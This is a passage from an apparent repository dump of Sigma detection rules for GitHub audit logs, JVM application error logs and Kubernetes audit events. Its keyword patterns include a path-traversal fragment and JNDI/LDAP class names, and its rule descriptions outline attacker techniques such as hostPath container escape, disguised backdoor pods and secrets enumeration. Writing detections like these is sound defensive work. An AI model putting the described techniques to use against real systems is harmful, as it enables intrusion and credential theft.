You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'business_advanced_security.disabled_for_new_repos' - 'business_advanced_security.disabled_for_new_user_namespace_repos' - 'business_advanced_security.disabled' - 'business_advanced_security.user_namespace_repos_disabled' - 'org.advanced_security_disabled_for_new_repos' - 'org.advanced_security_disabled_on_all_repos' - 'org.advanced_security_policy_selected_member_disabled' - 'org.disable_oauth_app_restrictions' - 'org.disable_two_factor_requirement' - 'repo.advanced_security_disabled' condition: selection falsepositives: - Approved administrator/owner activities. level: high ================================================ FILE: rules/application/github/audit/github_disabled_outdated_dependency_or_vulnerability.yml ================================================ title: Outdated Dependency Or Vulnerability Alert Disabled id: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d status: test description: | Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories. author: Muhammad Faisal (@faisalusuf) date: 2023-01-27 references: - https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization tags: - attack.initial-access - attack.t1195.001 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs.
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'dependabot_alerts_new_repos.disable' - 'dependabot_alerts.disable' - 'dependabot_security_updates_new_repos.disable' - 'dependabot_security_updates.disable' - 'repository_vulnerability_alerts.disable' condition: selection falsepositives: - Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes. level: high ================================================ FILE: rules/application/github/audit/github_fork_private_repos_enabled_or_cleared.yml ================================================ title: Github Fork Private Repositories Setting Enabled/Cleared id: 69b3bd1e-b38a-462f-9a23-fbdbf63d2294 status: test description: | Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared). references: - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking author: Romain Gaillard (@romain-gaillard) date: 2024-07-29 tags: - attack.persistence - attack.exfiltration - attack.t1020 - attack.t1537 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. 
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'private_repository_forking.clear' # An enterprise owner cleared the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise. - 'private_repository_forking.enable' # An enterprise owner enabled the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise. Private and internal repositories are always allowed to be forked. condition: selection falsepositives: - Allowed administrative activities. level: medium ================================================ FILE: rules/application/github/audit/github_new_org_member.yml ================================================ title: New Github Organization Member Added id: 3908d64a-3c06-4091-b503-b3a94424533b status: test description: Detects when a new member is added or invited to a github organization. author: Muhammad Faisal (@faisalusuf) date: 2023-01-29 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions tags: - attack.persistence - attack.t1136.003 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. 
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'org.add_member' - 'org.invite_member' condition: selection falsepositives: - Organization approved new members level: informational ================================================ FILE: rules/application/github/audit/github_new_secret_created.yml ================================================ title: Github New Secret Created id: f9405037-bc97-4eb7-baba-167dad399b83 status: test description: Detects when a user creates an action secret for the organization, environment, codespaces or repository. author: Muhammad Faisal (@faisalusuf) date: 2023-01-20 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions tags: - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.initial-access - attack.t1078.004 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'codespaces.create_an_org_secret' - 'environment.create_actions_secret' - 'org.create_actions_secret' - 'repo.create_actions_secret' condition: selection falsepositives: - This detection could be noisy depending on the environment. It is recommended to keep a check on new secrets when they are created and to validate the "actor".
level: low ================================================ FILE: rules/application/github/audit/github_outside_collaborator_detected.yml ================================================ title: Github Outside Collaborator Detected id: eaa9ac35-1730-441f-9587-25767bde99d7 status: test description: | Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA. author: Muhammad Faisal (@faisalusuf) date: 2023-01-20 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization tags: - attack.privilege-escalation - attack.persistence - attack.collection - attack.t1098.001 - attack.t1098.003 - attack.t1213.003 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'org.remove_outside_collaborator' - 'project.update_user_permission' condition: selection falsepositives: - Validate the actor if permitted to access the repo. - Validate the Multifactor Authentication changes. 
level: medium ================================================ FILE: rules/application/github/audit/github_pages_site_changed_to_public.yml ================================================ title: GitHub Repository Pages Site Changed to Public id: 0c46d4f4-a2bf-4104-9597-8d653fc2bb55 status: experimental description: | Detects when a GitHub Pages site of a repository is made public. This usually is part of a publishing process but could indicate or lead to potential unauthorized exposure of sensitive information or code. references: - https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events author: Ivan Saakov date: 2025-10-18 tags: - attack.collection - attack.exfiltration - attack.t1567.001 logsource: product: github service: audit detection: selection: action: 'repo.pages_public' condition: selection falsepositives: - Legitimate publishing of repository pages by authorized users level: low ================================================ FILE: rules/application/github/audit/github_push_protection_bypass_detected.yml ================================================ title: Github Push Protection Bypass Detected id: 02cf536a-cf21-4876-8842-4159c8aee3cc status: test description: Detects when a user bypasses the push protection on a secret detected by secret scanning. 
references: - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html author: Muhammad Faisal (@faisalusuf) date: 2024-03-07 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action|contains: 'secret_scanning_push_protection.bypass' condition: selection falsepositives: - Allowed administrative activities. level: low ================================================ FILE: rules/application/github/audit/github_push_protection_disabled.yml ================================================ title: Github Push Protection Disabled id: ccd55945-badd-4bae-936b-823a735d37dd status: test description: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. references: - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html author: Muhammad Faisal (@faisalusuf) date: 2024-03-07 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. 
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'business_secret_scanning_custom_pattern_push_protection.disabled' - 'business_secret_scanning_push_protection.disable' - 'business_secret_scanning_push_protection.disabled_for_new_repos' - 'org.secret_scanning_custom_pattern_push_protection_disabled' - 'org.secret_scanning_push_protection_disable' - 'org.secret_scanning_push_protection_new_repos_disable' - 'repository_secret_scanning_custom_pattern_push_protection.disabled' condition: selection falsepositives: - Allowed administrative activities. level: high ================================================ FILE: rules/application/github/audit/github_repo_or_org_transferred.yml ================================================ title: Github Repository/Organization Transferred id: 04ad83ef-1a37-4c10-b57a-81092164bf33 status: test description: Detects when a repository or an organization is being transferred to another location. references: - https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository - https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership - https://docs.github.com/en/migrations - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration author: Romain Gaillard (@romain-gaillard) date: 2024-07-29 tags: - attack.persistence - attack.exfiltration - attack.t1020 - attack.t1537 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. 
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'migration.create' # A migration file was created for transferring data from a source location (such as a GitHub.com organization or a GitHub Enterprise Server instance) to a target GitHub Enterprise Server instance. - 'org.transfer_outgoing' # An organization was transferred between enterprise accounts. - 'org.transfer' # An organization was transferred between enterprise accounts. - 'repo.transfer_outgoing' # A repository was transferred to another repository network. condition: selection falsepositives: - Allowed administrative activities. level: medium ================================================ FILE: rules/application/github/audit/github_repository_archive_status_changed.yml ================================================ title: GitHub Repository Archive Status Changed id: dca8991c-cb16-4128-abf8-6b11e5cd156f status: experimental description: | Detects when a GitHub repository is archived or unarchived, which may indicate unauthorized changes to repository status. references: - https://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events author: Ivan Saakov date: 2025-10-18 tags: - attack.persistence - attack.defense-evasion - attack.impact logsource: product: github service: audit detection: selection: action: - 'repo.archived' - 'repo.unarchived' condition: selection falsepositives: - Archiving or unarchiving a repository is often legitimate. Investigate this action to determine if it was authorized. 
level: low ================================================ FILE: rules/application/github/audit/github_secret_scanning_feature_disabled.yml ================================================ title: Github Secret Scanning Feature Disabled id: 3883d9a0-fd0f-440f-afbb-445a2a799bb8 status: test description: Detects if the secret scanning feature is disabled for an enterprise or repository. references: - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning author: Muhammad Faisal (@faisalusuf) date: 2024-03-07 modified: 2024-07-19 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'business_secret_scanning.disable' - 'business_secret_scanning.disabled_for_new_repos' - 'repository_secret_scanning.disable' - 'secret_scanning_new_repos.disable' - 'secret_scanning.disable' condition: selection falsepositives: - Allowed administrative activities. level: high ================================================ FILE: rules/application/github/audit/github_self_hosted_runner_changes_detected.yml ================================================ title: Github Self Hosted Runner Changes Detected id: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd status: test description: | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected, it should be validated in the GitHub UI, because the audit log entry may not provide full context. 
author: Muhammad Faisal (@faisalusuf) date: 2023-01-27 references: - https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation tags: - attack.impact - attack.discovery - attack.collection - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.initial-access - attack.t1526 - attack.t1213.003 - attack.t1078.004 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'org.remove_self_hosted_runner' - 'org.runner_group_created' - 'org.runner_group_removed' - 'org.runner_group_runner_removed' - 'org.runner_group_runners_added' - 'org.runner_group_runners_updated' - 'org.runner_group_updated' - 'repo.register_self_hosted_runner' - 'repo.remove_self_hosted_runner' condition: selection falsepositives: - Allowed self-hosted runners changes in the environment. - A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days. - An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day. 
level: low ================================================ FILE: rules/application/github/audit/github_ssh_certificate_config_changed.yml ================================================ title: Github SSH Certificate Configuration Changed id: 2f575940-d85e-4ddc-af13-17dad6f1a0ef status: test description: Detects when changes are made to the SSH certificate configuration of the organization. references: - https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority author: Romain Gaillard (@romain-gaillard) date: 2024-07-29 tags: - attack.initial-access - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.t1078.004 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'ssh_certificate_authority.create' # An SSH certificate authority for an organization or enterprise was created. - 'ssh_certificate_requirement.disable' # The requirement for members to use SSH certificates to access an organization resources was disabled. condition: selection falsepositives: - Allowed administrative activities. 
level: medium ================================================ FILE: rules/application/jvm/java_jndi_injection_exploitation_attempt.yml ================================================ title: Potential JNDI Injection Exploitation In JVM Based Application id: bb0e9cec-d4da-46f5-997f-22efc59f3dca status: test description: Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation. references: - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs - https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0 author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 logsource: category: application product: jvm definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords: - 'com.sun.jndi.ldap.' - 'org.apache.logging.log4j.core.net.JndiManager' condition: keywords falsepositives: - Application bugs level: high ================================================ FILE: rules/application/jvm/java_local_file_read.yml ================================================ title: Potential Local File Read Vulnerability In JVM Based Application id: e032f5bc-4563-4096-ae3b-064bab588685 status: test description: | Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag. references: - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 logsource: category: application product: jvm definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords_local_file_read: '|all': - 'FileNotFoundException' - '/../../..' 
condition: keywords_local_file_read falsepositives: - Application bugs level: high ================================================ FILE: rules/application/jvm/java_ognl_injection_exploitation_attempt.yml ================================================ title: Potential OGNL Injection Exploitation In JVM Based Application id: 4d0af518-828e-4a04-a751-a7d03f3046ad status: test description: | Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134) references: - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 - cve.2017-5638 - cve.2022-26134 logsource: category: application product: jvm definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords: - 'org.apache.commons.ognl.OgnlException' - 'ExpressionSyntaxException' condition: keywords falsepositives: - Application bugs level: high ================================================ FILE: rules/application/jvm/java_rce_exploitation_attempt.yml ================================================ title: Process Execution Error In JVM Based Application id: d65f37da-a26a-48f8-8159-3dde96680ad2 status: test description: Detects process execution related exceptions in JVM based apps, often relates to RCE references: - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 logsource: category: application product: jvm definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords: - 'Cannot run program' - 'java.lang.ProcessImpl' - 
'java.lang.ProcessBuilder' condition: keywords falsepositives: - Application bugs level: high ================================================ FILE: rules/application/jvm/java_xxe_exploitation_attempt.yml ================================================ title: Potential XXE Exploitation Attempt In JVM Based Application id: c4e06896-e27c-4583-95ac-91ce2279345d status: test description: Detects XML parsing exceptions that may result from XXE payloads. If the application is expected to process XML, make sure the parser is initialized securely (external entity resolution disabled), as parse errors alone do not prove exploitation. references: - https://rules.sonarsource.com/java/RSPEC-2755 - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 logsource: category: application product: jvm definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords: - 'SAXParseException' - 'DOMException' condition: keywords falsepositives: - If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE. level: high ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml ================================================ title: Kubernetes Admission Controller Modification id: eed82177-38f5-4299-8a76-098d50d225ab related: - id: 6ad91e31-53df-4826-bd27-0166171c8040 type: similar status: test description: | Detects when a modification (create, update, patch, replace or delete) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials. 
references: - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/ - https://security.padok.fr/en/blog/kubernetes-webhook-attackers author: kelnage date: 2024-07-11 tags: - attack.privilege-escalation - attack.initial-access - attack.defense-evasion - attack.persistence - attack.t1078 - attack.credential-access - attack.t1552 - attack.t1552.007 logsource: product: kubernetes service: audit detection: selection: objectRef.apiGroup: 'admissionregistration.k8s.io' objectRef.resource: - 'mutatingwebhookconfigurations' - 'validatingwebhookconfigurations' verb: - 'create' - 'delete' - 'patch' - 'replace' - 'update' condition: selection falsepositives: - Modifying the Kubernetes Admission Controller may need to be done by a system administrator. - Automated processes may need to take these actions and may need to be filtered. level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml ================================================ title: Kubernetes CronJob/Job Modification id: 0c9b3bda-41a6-4442-9345-356ae86343dc related: - id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435 type: similar status: test description: | Detects when a Kubernetes CronJob or Job is created, modified or deleted. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence. 
references: - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/ - https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob author: kelnage date: 2024-07-11 tags: - attack.persistence - attack.privilege-escalation - attack.execution logsource: product: kubernetes service: audit detection: selection: objectRef.apiGroup: 'batch' objectRef.resource: - 'cronjobs' - 'jobs' verb: - 'create' - 'delete' - 'patch' - 'replace' - 'update' condition: selection falsepositives: - Modifying a Kubernetes Job or CronJob may need to be done by a system administrator. - Automated processes may need to take these actions and may need to be filtered. level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml ================================================ title: Deployment Deleted From Kubernetes Cluster id: 40967487-139b-4811-81d9-c9767a92aa5a status: test description: | Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations. references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1498 - attack.impact logsource: category: application product: kubernetes service: audit detection: selection: verb: 'delete' objectRef.resource: 'deployments' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml ================================================ title: Kubernetes Events Deleted id: 3132570d-cab2-4561-9ea6-1743644b2290 related: - id: 225d8b09-e714-479c-a0e4-55e6f29adf35 type: derived status: test description: | Detects when events are deleted in Kubernetes. 
An adversary may delete Kubernetes events in an attempt to evade detection. references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.defense-evasion - attack.t1070 logsource: category: application product: kubernetes service: audit detection: selection: verb: 'delete' objectRef.resource: 'events' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml ================================================ title: Potential Remote Command Execution In Pod Container id: a1b0ca4e-7835-413e-8471-3ff2b8a66be6 status: test description: | Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command. references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1609 - attack.execution logsource: category: application product: kubernetes service: audit detection: selection: verb: 'create' objectRef.resource: 'pods' objectRef.subresource: 'exec' condition: selection falsepositives: - Legitimate debugging activity. Investigate the identity performing the requests and their authorization. level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml ================================================ title: Container With A hostPath Mount Created id: 402b955c-8fe0-4a8c-b635-622b4ac5f902 status: test description: | Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node. 
references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/ - https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216 author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1611 - attack.privilege-escalation logsource: category: application product: kubernetes service: audit detection: selection: verb: 'create' objectRef.resource: 'pods' hostPath: '*' # Note: Add the "exists" when it's implemented in SigmaHQ/Aurora condition: selection falsepositives: - The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace. level: low ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml ================================================ title: Creation Of Pod In System Namespace id: a80d927d-ac6e-443f-a867-e8d6e3897318 status: test description: | Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers. 
references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.defense-evasion - attack.t1036.005 logsource: category: application product: kubernetes service: audit detection: selection: verb: 'create' objectRef.resource: 'pods' objectRef.namespace: kube-system condition: selection falsepositives: - System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml ================================================ title: Privileged Container Deployed id: c5cd1b20-36bb-488d-8c05-486be3d0cb97 status: test description: | Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. 
by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields. Note that the selection below only keys on the presence of a capabilities field in the pod specification; pods made privileged solely via securityContext.privileged or hostNetwork/hostPID are not matched by this rule. references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/ - https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer - https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html - https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1611 - attack.privilege-escalation logsource: category: application product: kubernetes service: audit detection: selection: verb: 'create' objectRef.resource: 'pods' capabilities: '*' # Note: Add the "exists" when it's implemented in SigmaHQ/Aurora condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml ================================================ title: RBAC Permission Enumeration Attempt id: 84b777bd-c946-4d17-aa2e-c39f5a454325 status: test description: | Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server and creating a SelfSubjectRulesReview (the API behind e.g. a "kubectl auth can-i --list" command), which enumerates the Role-Based Access Control (RBAC) rules defining the compromised user's authorization. The selection keys on a top-level apiGroup field, whereas the other kubernetes audit rules in this directory use objectRef.apiGroup; verify the field mapping for your backend. 
references: - https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1069.003 - attack.t1087.004 - attack.discovery logsource: category: application product: kubernetes service: audit detection: selection: verb: 'create' apiGroup: 'authorization.k8s.io' objectRef.resource: 'selfsubjectrulesreviews' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml ================================================ title: Kubernetes Rolebinding Modification id: 10b97915-ec8d-455f-a815-9a78926585f6 related: - id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e type: similar status: test description: | Detects when a Kubernetes RoleBinding or ClusterRoleBinding is created, modified or deleted. Binding additional roles to a subject is a common RBAC privilege escalation path. references: - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/ - https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab author: kelnage date: 2024-07-11 tags: - attack.privilege-escalation logsource: product: kubernetes service: audit detection: selection: objectRef.apiGroup: 'rbac.authorization.k8s.io' objectRef.resource: - 'clusterrolebindings' - 'rolebindings' verb: - 'create' - 'delete' - 'patch' - 'replace' - 'update' condition: selection falsepositives: - Modifying a Kubernetes Rolebinding may need to be done by a system administrator. - Automated processes may need to take these actions and may need to be filtered. 
level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml ================================================ title: Kubernetes Secrets Enumeration id: eeb3e9e1-b685-44e4-9232-6bb701f925b5 related: - id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c type: derived status: test description: Detects enumeration (list) of Kubernetes secrets, which an identity with sufficient permissions can use to harvest credentials stored in the cluster. references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1552.007 - attack.credential-access logsource: category: application product: kubernetes service: audit detection: selection: verb: 'list' objectRef.resource: 'secrets' condition: selection falsepositives: - The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret level: low ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml ================================================ title: Kubernetes Secrets Modified or Deleted id: 58d31a75-a4f8-4c40-985b-373d58162ca2 related: - id: 2f0bae2d-bf20-4465-be86-1311addebaa3 type: similar status: test description: | Detects when Kubernetes Secrets are created, modified or deleted. references: - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/ - https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/ author: kelnage date: 2024-07-11 tags: - attack.credential-access logsource: product: 